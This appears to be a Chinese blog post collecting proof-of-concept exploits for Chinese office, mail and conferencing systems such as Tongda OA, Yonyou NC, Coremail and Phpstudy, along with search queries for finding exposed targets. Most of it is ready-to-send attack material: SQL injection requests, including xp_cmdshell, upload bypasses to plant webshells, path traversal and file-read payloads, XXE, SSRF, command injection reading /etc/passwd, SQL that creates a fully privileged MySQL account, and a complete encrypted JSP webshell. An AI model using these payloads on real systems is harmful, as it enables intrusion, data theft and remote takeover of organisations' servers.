    shell地址为 : www.test.com/general/vmeet/wbUpload/test.php

通达OA 11.2 后台getshell

系统管理-附件管理-添加存储目录
设置存储目录 (一般默认网站安装目录为 D:/MYOA/webroot/ 最后也有路径获取的地方,如果不设置会不在网站根目录下,无法直接访问附件)
寻找附件上传
通过.php. 绕过黑名单上传
根据返回结果拼接上传路径:/im/1912/383971046.test.php 直接访问(im是模块)

通达 OA 任意用户登录漏洞

通达oa 11.5 sql注入漏洞

  • POC | Payload | exp

    POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: https://www.0-sec.org/portal/home/
    Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
    Connection: keep-alive
    Host: www.0-sec.org
    Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 154
    X-WVS-ID: Acunetix-Autologin/65535
    Cache-Control: no-cache
    Accept: */*
    Origin: https://www.0-sec.org
    Accept-Language: en-US,en;q=0.9
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    
    starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1
    
    /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total=
    
    /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total=
    
    /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=1+RLIKE+(SELECT+(CASE+WHEN(substr(user(),1,1)=0x72)+THEN+1+ELSE+0x28+END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag=
    
    /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2
    
    POST /general/file_folder/swfupload_new.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/
    Connection: close
    Host: 192.168.202.1
    Content-Length: 391
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
    
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="ATTACHMENT_ID"
    
    1
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="ATTACHMENT_NAME"
    
    1
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="FILE_SORT"
    
    2
    ------------GFioQpMK0vv2
    Content-Disposition: form-data; name="SORT_ID"
    
    ------------GFioQpMK0vv2--
    
    POST /general/file_folder/api.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&SORT_ID=59
    X-Resource-Type: xhr
    Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
    Connection: close
    Host: 192.168.202.1
    Pragma: no-cache
    x-requested-with: XMLHttpRequest
    Content-Length: 82
    x-wvs-id: Acunetix-Deepscan/209
    Cache-Control: no-cache
    accept: */*
    origin: http://192.168.202.1
    Accept-Language: en-US
    content-type: application/x-www-form-urlencoded; charset=UTF-8
    
    CONTENT_ID_STR=222&SORT_ID=59&FILE_SORT=1&action=sign
    
    POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true
    X-Resource-Type: xhr
    Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701
    Connection: close
    Host: 192.168.202.1
    Pragma: no-cache
    x-requested-with: XMLHttpRequest
    Content-Length: 97
    x-wvs-id: Acunetix-Deepscan/186
    Cache-Control: no-cache
    accept: */*
    origin: http://192.168.202.1
    Accept-Language: en-US
    content-type: application/x-www-form-urlencoded; charset=UTF-8
    
    m_id=5&join_flag=2&remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--
    

通达oa 11.5 未授权访问漏洞

  • POC | Payload | exp
    /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=1597997506&view=agendaDay
    

通达 OA 任意文件上传漏洞+本地文件包含漏洞

  • 相关文章

  • 详情

    • 2013

      /ispirit/im/upload.php
      /ispirit/interface/gateway.php
      
    • 2017

      /ispirit/im/upload.php
      /mac/gateway.php
      
  • POC | Payload | exp

    POST /mac/gateway.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Go-http-client/1.1
    Connection: close
    Content-Length: 44
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    
    json={"url":"/general/../../mysql5/my.ini"}
    

通达OA v11.6 preauth RCE

通达OA v11.7 后台SQL注入

  • 相关文章

  • POC | Payload | exp

    需要登录权限

    /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=(SELECT count(*) FROM information_schema.columns A, information_schema.columns B where 1=1 and (LENGTH(database())=5))
    /general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))
    
    添加一个mysql用户
    grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
    
    给创建的at666账户添加mysql权限
    UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));
    
    刷新数据库登录到数据库
    /general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;
    
    通达OA配置mysql默认是不开启外网访问的所以需要修改mysql授权登录
    /general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
    

通达OA v11.7 后台任意文件读取

  • POC | Payload | exp
    /ispirit/im/photo.php?AVATAR_FILE=c:/oa/bin/redis.windows.conf&UID=1
    

通达OA v11.7 后台敏感信息泄露

  • POC | Payload | exp
    /general/approve_center/archive/getTableStruc.php
    

通达OA v11.7 后台ssrf

  • POC | Payload | exp
    /pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=wqx0mc.dnslog.cn
    

通达OA v11.7 在线用户登录漏洞

通达oa 11.7 后台getshell

通达oa 11.8 后台getshell

通达OA v11.9 upsharestatus 后台SQL注入漏洞

  • POC | Payload | exp
    POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    uid=15&status=1&id=1;select sleep(4)
    

信呼

fofa: app="信呼-OA系统"

信呼 OA 存储型 XSS


用友

Fofa: app="用友-UFIDA-NC"

相关工具

相关文章

用友 UFIDA OA 信息泄露

  • POC | Payload | exp
    /service/~iufo/com.ufida.web.action.ActionServlet? action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=
    # 登录进去后再访问信息泄露的地址,就有权限上传文件了。然后返回主页直接查看发表的内容就行了。
    

用友 UFIDA OA 任意文件读取

  • Fofa: app="用友-UFIDA-NC"
  • POC | Payload | exp
    /NCFindWeb?service=IPreAlertConfigService&filename=
    /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml  #数据库配置文件
    

用友 UFIDA OA SQLi

  • POC | Payload | exp
    /service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute
    

用友 UFIDA OA Web Service 默认后台自动登录

  • POC | Payload | exp
    后台:/uapws/   自动登录,默认密码:111111(6)
    

用友 UFIDA OA XXE

  • POC | Payload | exp
    /uapws/soapFormat.ajax
    
    msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///c:/windows/"> ]>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <soap:Fault>
    <faultcode>soap:Server%26xxe1two%3b</faultcode>
    </soap:Fault>
    </soap:Body>
    </soap:Envelope>%0a
    

用友 UFIDA OA Web Service SQLi

  • POC | Payload | exp
    /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl
    /uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl
    
    POST包:
    POST /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService HTTP/1.1
    Host: **xxx.xxx.com**
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 646
    
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"                     xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://crm.bd.itf.nc/ICurrtypeExportToCrmService" xmlns:urn2="http://pub.vo.nc/BusinessException" xmlns:urn3="http://ws.uap.nc/lang">     <SOAP-ENV:Header/>     <SOAP-ENV:Body>        <urn:exportCurrtypeToCrm>           <string>1</string>        </urn:exportCurrtypeToCrm>     </SOAP-ENV:Body></SOAP-ENV:Envelope>
    

致远 OA A6 setextno.jsp sql注入漏洞

  • POC | Payload | exp
    /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,@@version,user()%23
    /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1) and 1=2 union select 1,2,3,4,5,concat(0x23,user(),0x23,version(),0x23),7--
    

CNNVD-201610-923 && 用友 GRP-U8 SQL 注入

用友 U8 OA test.jsp SQL注入漏洞

  • Fofa: "用友U8-OA"
  • POC | Payload | exp
    /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
    

用友 NCCloud FS文件管理SQL注入

  • Fofa: "NCCloud"
  • POC | Payload | exp
    http://xxx.xxx.xxx.xxx/fs/
    使用 Sqlmap 对 username 参数 进行 SQL 注入
    

用友 NC DeleteServlet 反序列化

用友 NC XbrlPersistenceServlet反序列化

用友 NC FileReceiveServlet反序列化

用友 NC monitorservlet 反序列化

用友 NC ServiceDispatcherServlet 反序列化

CNVD-2022-60632 用友畅捷通T+ 文件上传


新点

Fofa : app="新点OA"

敏感信息泄露漏洞

  • POC | Payload | exp
    /ExcelExport/人员列表.xls
    通过获取的登录名登陆后台(默认密码11111)
    

万户

fofa: app="万户网络-CMS"

万户ezeip 3.0任意文件下载

  • POC | Payload | exp
    /download.ashx?files=../web.config
    

ezEIP 4.0 SQL注入

  • POC | Payload | exp
    POST /label/ajax/hit.aspx HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded
    
    type=0&colid=3&itemid=6&f=hits'
    

EzEIP 4.1.0 信息洩露漏洞

  • POC | Payload | exp
    GET /label/member/getinfo.aspx
    Cookie: WHIR_USERINFOR=whir_mem_member_pid=1;
    

红帆

Fofa : app="红帆-ioffice"

老版本 SQL注入

  • POC | Payload | exp
    POST /ioffice/prg/set/wss/ioCtlSet.asmx HTTP/1.1
    Host: **.**.**.**
    SOAPAction: "http://**.**.**.**/SignOut"
    Content-Type: text/xml; charset=utf-8
    
    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/" xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema">
    <soap:Body>
        <SignOut xmlns="http://**.**.**.**/">
        <SessionID>'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'</SessionID>
        </SignOut>
    </soap:Body>
    </soap:Envelope>
    

金和

Fofa : app="Jinher-OA"

金和OA C6 download.jsp 任意文件读取漏洞

  • POC | Payload | exp
    /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
    

金和OA C6 EditMain.aspx 后台文件写入漏洞

  • POC | Payload | exp
    /C6/JHSoft.Web.Portal/EditMain.aspx?id=cmdshell.aspx
    
    /C6/JHSoft.Web.Portal/Default/cmdshell.aspx
    

金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞

  • POC | Payload | exp
    /C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330
    

华天

Fofa : app="华天动力-OA8000"

workFlowService SQL注入漏洞

  • POC | Payload | exp
    POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
    
    
    <buffalo-call>
    <method>getDataListForTree</method>
    <string>select user()</string>
    </buffalo-call>
    

SuiteCRM

CVE-2021-45897 SuiteCRM 远程命令执行漏洞


邮服

Exchange

亿邮电子邮件系统

fofa: body="亿邮电子邮件系统"

亿邮电子邮件系统远程命令执行

  • POC | Payload | exp
    POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
    Host: x.x.x.x
    Content-Length: 25
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36
    
    type='|cat /etc/passwd||'
    

Coremail

官网 : https://www.coremail.cn/

Coremail 论客邮件系统于2000年首发,是中国第一套中文邮件系统。是网易等运营商至今一直使用的邮件系统,也是政府机关、大学、金融机构、上市公司及其他大型企业(包含国有企业)广泛使用的邮件系统。

相关工具

版本信息

  • POC | Payload | exp
    /coremail/s/json?func=verify
    

爆破用户名

  • POC | Payload | exp
    /coremail/s?func=user:getLocaleUserName
    {
    "email":"zhangsan"
    "defaultURL":"1"
    }
    

任意密码修改

配置文件信息泄漏

CVE-2020-29133 Coremail 存储型XSS

  • POC | Payload | exp
    coremail/XT5/jsp/upload.jsp  上传 1.jpg.html
    

目录穿越泄漏后台漏洞

  • 相关文章

  • 描述

    访问过去会直接跳转到 tomcat 控制台,这里你就可以采用 coremail/coremail 弱口令尝试登陆,或者暴力破解。然后就是部署 war 包 Getshell 就 ok 了。

  • POC | Payload | exp

    /lunkr/cache/;/;/../../manager.html
    

文件上传

  • POC | Payload | exp

    POST /webinst/action.jsp HTTP/1.1
    Host:
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Content-Length: 99
    
    func=checkserver&webServerName=127.0.0.1:6132/%0d@/home/coremail/web/webapp/justtest.jsp%20shenye
    
    /coremail/justtest.jsp
    

Other

NVMS-1000

Fofa : app="TVT-NVMS-1000"

路径遍历漏洞

  • POC | Payload | exp
    GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
    Host: **.**.**.**
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
    Connection: close
    

远秋医学技能考试系统

Fofa : 远秋医学技能考试系统

SQL注入漏洞

  • POC | Payload | exp
    /NewsDetailPage.aspx?key=news&id=1
    

汉王人脸考勤管理系统

Fofa : title="汉王人脸考勤管理系统"

万能密码

  • POC | Payload | exp
    用户名 user: or' or 1=1--
    密码 or
    

SQL 注入

  • POC | Payload | exp
    POST /Login/Check HTTP/1.1
    Host: xxx.xxx.xxx.xxx
    Content-Length: 26
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://xxx.xxx.xxx.xxx:10000
    Referer: http://xxx.xxx.xxx.xxx:10000/Login/index
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: ASP.NET_SessionId=yr1cr5dd5c4g5tl33pu2yyep
    Connection: close
    
    strName=admin&strPwd=admin
    

会捷通云视讯平台

相关文章

登陆逻辑漏洞

  • POC | Payload | exp
    修改错误返回包 为正确的返回包
    
    {"token":null,"result":null}
    

任意文件读取

  • POC | Payload | exp
    POST /fileDownload?action=downloadBackupFile HTTP/1.1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    
    fullPath=/etc/passwd
    

目录遍历

  • POC | Payload | exp
    /him/api/rest/V1.0/system/log/list?filePath=../
    

好视通视频会议系统

fofa: app="Hanming-Video-Conferencing"

任意文件下载

  • POC | Payload | exp
    /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
    

和信云桌面

fofa: body="和信下一代云桌面"

核心创天云桌面系统远程命令执行

  • POC | Payload | exp
    POST /Upload/upload_file.php?l=test HTTP/1.1
    Host: x.x.x.x
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
    Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
    Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
    Connection: close
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
    Content-Length: 183
    
    ------WebKitFormBoundaryfcKRltGv
    Content-Disposition: form-data; name="file"; filename="test.php"
    Content-Type: image/avif
    
    <?php phpinfo(); ?>
    ------WebKitFormBoundaryfcKRltGv--
    

联软准入系统

联软准入系统任意文件上传

  • POC | Payload | exp
    • 联软准入系统任意文件上传
      POST /uai/download/uploadfileToPath.htm HTTP/1.1
      HOST: xxxxx
      
      -----------------------------570xxxxxxxxx6025274xxxxxxxx1
      Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
      Content-Type: image/png
      
      <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
      
      -----------------------------570xxxxxxxxx6025274xxxxxxxx1
      Content-Disposition: form-data; name="uploadpath"
      
      ../webapps/notifymsg/devreport/
      -----------------------------570xxxxxxxxx6025274xxxxxxxx1--
      

ClusterEngine

Fofa: title="TSCEV4.0"

CVE-2020-21224


华视美达

相关文章


Centos-Web-Panel

CVE-2018-18323

CVE-2021-45467


WebPageTest

相关文章


Oracle Access Manager

CVE-2021-35587


RDWA

相关工具

  • p0dalirius/RDWArecon - A python script to extract information from a Microsoft Remote Desktop Web Access (RDWA) application

Phpstudy

Phpstudy 后门 RCE

  • POC | Payload | exp
    GET /1.php HTTP/1.1
    Host: example.com
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.9
    Accept-Encoding:gzip,deflate
    Accept-Charset:这里就是要执行的命令base64加密 c3lzdGVtKCdjYWxjLmV4ZScpOw==
    Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
    Connection: close
    

PhpStudy nginx 解析漏洞

  • 描述

    此次漏洞是 Nginx 的解析漏洞,由于 phpstudy 中配置文件的不当,造成了 / xx.php 解析漏洞,故此将文件解析为 php 运行。

  • 相关文章

  • POC | Payload | exp
    需要把 php 恶意文件上传到服务器。

    <?php phpinfo();?>
    

    通过 /x.txt/x.php 方式访问上传的图片地址,解析 php 代码。

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

posted @ 2022-11-02 18:40  syscallwww  阅读(1274)  评论(0编辑  收藏  举报